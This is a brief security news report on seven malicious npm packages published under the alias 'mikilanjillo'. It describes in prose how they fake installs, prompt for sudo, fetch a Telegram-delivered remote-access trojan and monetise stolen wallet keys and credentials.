A Sneaky npm Scam That Steals Crypto and Secrets

Cybersecurity experts have uncovered a new set of npm packages that masquerade as harmless tools but secretly siphon crypto wallets and personal data.

• Attackers: Operate under the alias “mikilanjillo,” releasing seven distinct packages.
• Tactics: Each package pretends to download additional modules, displays fake install logs, and inserts random pauses to convince users that the process is normal.
• Privilege Escalation: When a “permission error” occurs, the package prompts for your sudo or admin password. If granted, it quietly pulls a second‑stage downloader that contacts a Telegram channel.
• Delivery: The Telegram channel supplies the final malicious file and the key to unlock it.
• Outcome: A remote‑access trojan capable of stealing wallet keys, browser passwords, SSH keys, and other sensitive information. It also awaits commands from a remote server to determine its next actions.

Similarities to GhostClaw

Security researchers note resemblances with the GhostClaw threat, which also uses GitHub repositories and AI tools to conceal malicious code. Both campaigns exploit trusted development environments, making developers who install seemingly useful libraries easy targets.

Data Exfiltration & Monetization

• Data Storage: Stolen data is stored in Telegram bots and tracked via a smart‑contract on the Binance Smart Chain.
• Revenue Streams:
  
  1. Selling stolen credentials.
  2. Redirecting users to affiliate links.

The Bigger Picture

This trend illustrates how cybercriminals are evolving beyond classic package‑registry tricks, embedding malicious code in popular open‑source projects. The result is a harder‑to‑detect threat that leverages developer trust to gain access and monetize stolen data.